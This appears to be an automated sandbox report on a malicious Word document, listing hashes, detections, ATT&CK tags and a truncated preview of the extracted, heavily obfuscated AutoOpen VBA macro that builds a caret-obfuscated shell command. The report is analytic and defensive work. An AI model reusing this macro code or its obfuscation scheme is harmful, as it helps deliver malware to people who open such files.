Office (OLE) malware analysis — malicious · b6bfc64074f98ac0

MALICIOUS

Office (OLE)

163.2 KB Created: 2018-09-25 07:47:00 Authoring application: Microsoft Office Word First seen: 2019-05-10

MD5: b81da8e0345540bb21dbf999da9f749f SHA-1: a8013650dbc2a31c6f75fa996170304e38aa7767 SHA-256: b6bfc64074f98ac044e40f1d75c071a3fba26c16ca86aea6b920a04af79b0aba

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a legacy WordBasic AutoOpen macro. The presence of a Shell() call within the VBA code indicates that it is designed to execute arbitrary commands. This functionality is commonly used to download and execute a second-stage payload, hence the high confidence in this attack pattern. The ClamAV detection name provides a specific identifier for this threat.

Heuristics 6

ClamAV: Doc.Malware.Valyria-6922959-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6922959-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 164682 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	164682 bytes
SHA-256: `1f9c1b3ddf052e8fabcffa51326a4ca0be7504f57c06289aaf66b71d429ed9dc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "XGMBXajD" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim qXiuf(1) qXiuf(0) = MidB(iDaRHGhO + RddvhrilUHIaXOjslFz + MUwHpG, 791, 524) + MidB(AmHTJfz + zkadDTmsWiZRfJjNiiijWrX + uZNliF, 976, 683) + MidB(uoCNrEDJ + zjwlYQUDDljHZJwqMja + zmjQnb, 379, 655) + MidB(QLdbN + ifhFOhdQvGTVaWmmHzjck + CImvhjuX, 42, 893) Dim kFCAV(2) kFCAV(0) = Mid(OTdtYD + opzDzCXUdXNXYwWJCjEwL + oYZPNs, 860, 161) + MidB(EqSOMah + SpqUFRCtujrlHaNFPfVP + TlEvqG, 441, 527) kFCAV(1) = Left(hwDTwLw + XqSirBVcHSwElfwww + PXdtO, 929) + MidB(EjOAu + CMtdkTvhGaziSJaKauEwm + VDlhZdd, 699, 548) Dim TDRwc(2) TDRwc(0) = Left(ozDoqhF + AGzOHMAQKzhwVbvqXsiSI + TjhMEczt, 560) + MidB(XwGCtfR + rbFzPODqWnpCUrEGWhDs + EwjUz, 967, 25) + Right(Frajw + wCGqoVMhCbLaXmlLnfir + ivFCuHH, 769) + MidB(AldXjMX + WqkjQIozfiNLiEJKnuUXRl + JObbHutB, 925, 897) TDRwc(1) = Left(tGJVIaXp + NJfMADTSzdLKEaTRhI + tRjlzO, 825) + Right(ukBSwvuq + cOKhbaLzEXVQlvTSCEbj + uhsIfY, 530) + MidB(nzijFKo + JbZTDWKAYwYAijQTwUfvmlK + LOHOv, 700, 508) + Right(adVzfzDm + VBSYRVMdfmhtaMRhcPDcZ + zwphsA, 599) Dim BUqbwA(2) BUqbwA(0) = Mid(XWGTBV + UEivjjwIZROzBEcpu + zNVvM, 969, 90) + Left(jIRkdQ + kosSWaVIYEPYzJGUZk + tIBhGji, 391) + Left(SEGNsb + ZEazkzDnaWwLZjKVCTpdET + bNlRf, 801) + Right(AHtXB + NDzoHsAOhGcbWfosbah + GjOfwFmT, 467) BUqbwA(1) = Left(ZGfoODM + ZMCaZlNJCsjuGisCIvmEZ + PAAiY, 256) + MidB(RtdoGM + JVJvizNkKKPomSXVNifi + Vpozom, 794, 318) + MidB(iQMWQDn + CukilBiriUirIKIPvY + wJZMFAFJ, 909, 726) + MidB(clKDwSD + XwqlnNFXzphwnVLhlUZsb + XAFTdVXM, 486, 226) Dim SnzPXo(1) SnzPXo(0) = MidB(jzprHCVM + FPiqqFoDUJjOJculFBEBHQ + OMbzK, 925, 525) + Mid(scwubU + lzijPEaaLwAObvarsUz + CIVUzrdh, 697, 900) + Right(rizSWZ + iGFRDhzcblmKGYjcjiO + EGYQaZ, 420) + Left(CIwCER + cEIJkJvBtnwACPpmIiaDFqWH + EURLqFK, 147) wTprkCCzCuL (KeyString(spptj + YFtkvrql + 5 + 7 + 9 + 11 + 35 + dWRYt + YNhvm) + VzEvX + tCHETMiB + KeyString(wGvBAIcz + UVjAlSq + 6 + 8 + 11 + 12 + 40 + muOKPkUK + FXWFiz) + jttCqFHKK + cqVvt + hzQwJkaqZz + jvkfKTAUKif + VHNabQj + mRcFpGluIk + nfvkzor + ZQCawjAzC + FFmWCIbEd + fjrHdIJIdS + olvLEjVHD + cOifiwPz + PsUIK) Dim CTNBI(1) CTNBI(0) = Mid(ZVkJwFic + jTrXXGIuZocwDIEqGv + uGMNFDmY, 746, 16) + MidB(qJdfbHt + AwYhdswdkFMZzRKEIBBb + qufZOzB, 114, 975) + MidB(ojcKp + QOPQLVwFoFVvFmwREX + GbDHW, 931, 473) + Right(FBLNLa + EPtNAEosbpMXrcJpIEw + unozJit, 247) Dim zHqqGW(1) zHqqGW(0) = MidB(iVjiuO + CCkaOFNSMQwfcwZrUoU + zmUhwL, 864, 500) + MidB(frbpkuu + tGKnUnlVXDqSackjOHT + AiqAHo, 946, 510) + MidB(JMpwAtsa + VnzrJIJNQQamqwFihZ + kqGldkn, 422, 637) + Right(DNjwrtfn + jjvELKwmqdsHNBDdaujidj + zOlBl, 313) Dim GKjSZ(2) GKjSZ(0) = Right(lFJLFTz + AOmzzFXlAwYKbVIutzMz + zYTVT, 822) + Left(VAXdlHB + jZrLaSkkKCuPCozjzCS + zooTzjBs, 25) GKjSZ(1) = MidB(ZszXHAl + zjCLHbwUsFOPlbwmAJ + iIpJpbYw, 337, 666) + Left(QlcMW + YIiRKwllBwiXnoYSHjvuo + twzwmQN, 308) Dim vqfKDq(1) vqfKDq(0) = Right(SzGMbNZu + NcOumXFlhPiVGCDmHEpD + ffjWmZ, 854) + MidB(CJVAEHE + LhjizXjNHwZRYGrZ + IWWmEshc, 141, 597) + Mid(krPmBjVw + lPHfkcwPfzKMsvR + Gctnn, 644, 30) + Mid(LDSvw + iYIdAPXoioJlDIwF + UrCDpu, 85, 527) End Sub Attribute VB_Name = "HZFNWJNG" Function jttCqFHKK() jrHVoH = "d" + " " + CStr(Chr(1 + 3 + 4 + 0 + 39)) + "V^" + ":^" + "O" + CStr(Chr(1 + 3 + 4 + 0 + 39)) + "C" + CStr(Chr(0 + 2 + 3 + 0 + 29)) + "s" cKLMGDWjb = "^e" + "^" + "t " + ";" + "^[" + "=" + "^5" + "^" + "90" + " ^" + "1^" + "9" + "0^" + " 9" + "5^" fjYQw = "0" + "^ " + "0^" + "3^" + "9 " + "^9" + "^" + "0" OqvIaEnszCY = "^" + "1" + "^ " + "^5" + "3" + "^0" + "^" + " " + "1" + "0" + "9 " + "9" + "^" + "3" RirdzDndzwC = "^0" + "^" + " ^" + "35" + "^" + "0 " + "5" + "19" + "^ " Dim GOnob(2) GOnob(0) = MidB(ZSAfw + LCDRtKJvaWdACDwkzSz + NfusVh, 80, 861) + Mid(XsUjdf + UuLGODIzjNYkiDNsR + WiuciX, 856, 444) GOnob(1) = MidB(nlcBJ + rjQkUfnIlmcusHYhLm + M ... (truncated)

SHA-256: 1f9c1b3ddf052e8fabcffa51326a4ca0be7504f57c06289aaf66b71d429ed9dc

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "XGMBXajD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim qXiuf(1)
qXiuf(0) = MidB(iDaRHGhO + RddvhrilUHIaXOjslFz + MUwHpG, 791, 524) + MidB(AmHTJfz + zkadDTmsWiZRfJjNiiijWrX + uZNliF, 976, 683) + MidB(uoCNrEDJ + zjwlYQUDDljHZJwqMja + zmjQnb, 379, 655) + MidB(QLdbN + ifhFOhdQvGTVaWmmHzjck + CImvhjuX, 42, 893)
   Dim kFCAV(2)
kFCAV(0) = Mid(OTdtYD + opzDzCXUdXNXYwWJCjEwL + oYZPNs, 860, 161) + MidB(EqSOMah + SpqUFRCtujrlHaNFPfVP + TlEvqG, 441, 527)
kFCAV(1) = Left(hwDTwLw + XqSirBVcHSwElfwww + PXdtO, 929) + MidB(EjOAu + CMtdkTvhGaziSJaKauEwm + VDlhZdd, 699, 548)
   Dim TDRwc(2)
TDRwc(0) = Left(ozDoqhF + AGzOHMAQKzhwVbvqXsiSI + TjhMEczt, 560) + MidB(XwGCtfR + rbFzPODqWnpCUrEGWhDs + EwjUz, 967, 25) + Right(Frajw + wCGqoVMhCbLaXmlLnfir + ivFCuHH, 769) + MidB(AldXjMX + WqkjQIozfiNLiEJKnuUXRl + JObbHutB, 925, 897)
TDRwc(1) = Left(tGJVIaXp + NJfMADTSzdLKEaTRhI + tRjlzO, 825) + Right(ukBSwvuq + cOKhbaLzEXVQlvTSCEbj + uhsIfY, 530) + MidB(nzijFKo + JbZTDWKAYwYAijQTwUfvmlK + LOHOv, 700, 508) + Right(adVzfzDm + VBSYRVMdfmhtaMRhcPDcZ + zwphsA, 599)
   Dim BUqbwA(2)
BUqbwA(0) = Mid(XWGTBV + UEivjjwIZROzBEcpu + zNVvM, 969, 90) + Left(jIRkdQ + kosSWaVIYEPYzJGUZk + tIBhGji, 391) + Left(SEGNsb + ZEazkzDnaWwLZjKVCTpdET + bNlRf, 801) + Right(AHtXB + NDzoHsAOhGcbWfosbah + GjOfwFmT, 467)
BUqbwA(1) = Left(ZGfoODM + ZMCaZlNJCsjuGisCIvmEZ + PAAiY, 256) + MidB(RtdoGM + JVJvizNkKKPomSXVNifi + Vpozom, 794, 318) + MidB(iQMWQDn + CukilBiriUirIKIPvY + wJZMFAFJ, 909, 726) + MidB(clKDwSD + XwqlnNFXzphwnVLhlUZsb + XAFTdVXM, 486, 226)
   Dim SnzPXo(1)
SnzPXo(0) = MidB(jzprHCVM + FPiqqFoDUJjOJculFBEBHQ + OMbzK, 925, 525) + Mid(scwubU + lzijPEaaLwAObvarsUz + CIVUzrdh, 697, 900) + Right(rizSWZ + iGFRDhzcblmKGYjcjiO + EGYQaZ, 420) + Left(CIwCER + cEIJkJvBtnwACPpmIiaDFqWH + EURLqFK, 147)
wTprkCCzCuL (KeyString(spptj + YFtkvrql + 5 + 7 + 9 + 11 + 35 + dWRYt + YNhvm) + VzEvX + tCHETMiB + KeyString(wGvBAIcz + UVjAlSq + 6 + 8 + 11 + 12 + 40 + muOKPkUK + FXWFiz) + jttCqFHKK + cqVvt + hzQwJkaqZz + jvkfKTAUKif + VHNabQj + mRcFpGluIk + nfvkzor + ZQCawjAzC + FFmWCIbEd + fjrHdIJIdS + olvLEjVHD + cOifiwPz + PsUIK)
   Dim CTNBI(1)
CTNBI(0) = Mid(ZVkJwFic + jTrXXGIuZocwDIEqGv + uGMNFDmY, 746, 16) + MidB(qJdfbHt + AwYhdswdkFMZzRKEIBBb + qufZOzB, 114, 975) + MidB(ojcKp + QOPQLVwFoFVvFmwREX + GbDHW, 931, 473) + Right(FBLNLa + EPtNAEosbpMXrcJpIEw + unozJit, 247)
   Dim zHqqGW(1)
zHqqGW(0) = MidB(iVjiuO + CCkaOFNSMQwfcwZrUoU + zmUhwL, 864, 500) + MidB(frbpkuu + tGKnUnlVXDqSackjOHT + AiqAHo, 946, 510) + MidB(JMpwAtsa + VnzrJIJNQQamqwFihZ + kqGldkn, 422, 637) + Right(DNjwrtfn + jjvELKwmqdsHNBDdaujidj + zOlBl, 313)
   Dim GKjSZ(2)
GKjSZ(0) = Right(lFJLFTz + AOmzzFXlAwYKbVIutzMz + zYTVT, 822) + Left(VAXdlHB + jZrLaSkkKCuPCozjzCS + zooTzjBs, 25)
GKjSZ(1) = MidB(ZszXHAl + zjCLHbwUsFOPlbwmAJ + iIpJpbYw, 337, 666) + Left(QlcMW + YIiRKwllBwiXnoYSHjvuo + twzwmQN, 308)
   Dim vqfKDq(1)
vqfKDq(0) = Right(SzGMbNZu + NcOumXFlhPiVGCDmHEpD + ffjWmZ, 854) + MidB(CJVAEHE + LhjizXjNHwZRYGrZ + IWWmEshc, 141, 597) + Mid(krPmBjVw + lPHfkcwPfzKMsvR + Gctnn, 644, 30) + Mid(LDSvw + iYIdAPXoioJlDIwF + UrCDpu, 85, 527)
End Sub


Attribute VB_Name = "HZFNWJNG"
Function jttCqFHKK()
jrHVoH = "d" + " " + CStr(Chr(1 + 3 + 4 + 0 + 39)) + "V^" + ":^" + "O" + CStr(Chr(1 + 3 + 4 + 0 + 39)) + "C" + CStr(Chr(0 + 2 + 3 + 0 + 29)) + "s"
cKLMGDWjb = "^e" + "^" + "t " + ";" + "^[" + "=" + "^5" + "^" + "90" + " ^" + "1^" + "9" + "0^" + " 9" + "5^"
fjYQw = "0" + "^ " + "0^" + "3^" + "9 " + "^9" + "^" + "0"
OqvIaEnszCY = "^" + "1" + "^ " + "^5" + "3" + "^0" + "^" + " " + "1" + "0" + "9 " + "9" + "^" + "3"
RirdzDndzwC = "^0" + "^" + " ^" + "35" + "^" + "0 " + "5" + "19" + "^ "
Dim GOnob(2)
GOnob(0) = MidB(ZSAfw + LCDRtKJvaWdACDwkzSz + NfusVh, 80, 861) + Mid(XsUjdf + UuLGODIzjNYkiDNsR + WiuciX, 856, 444)
GOnob(1) = MidB(nlcBJ + rjQkUfnIlmcusHYhLm + M
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.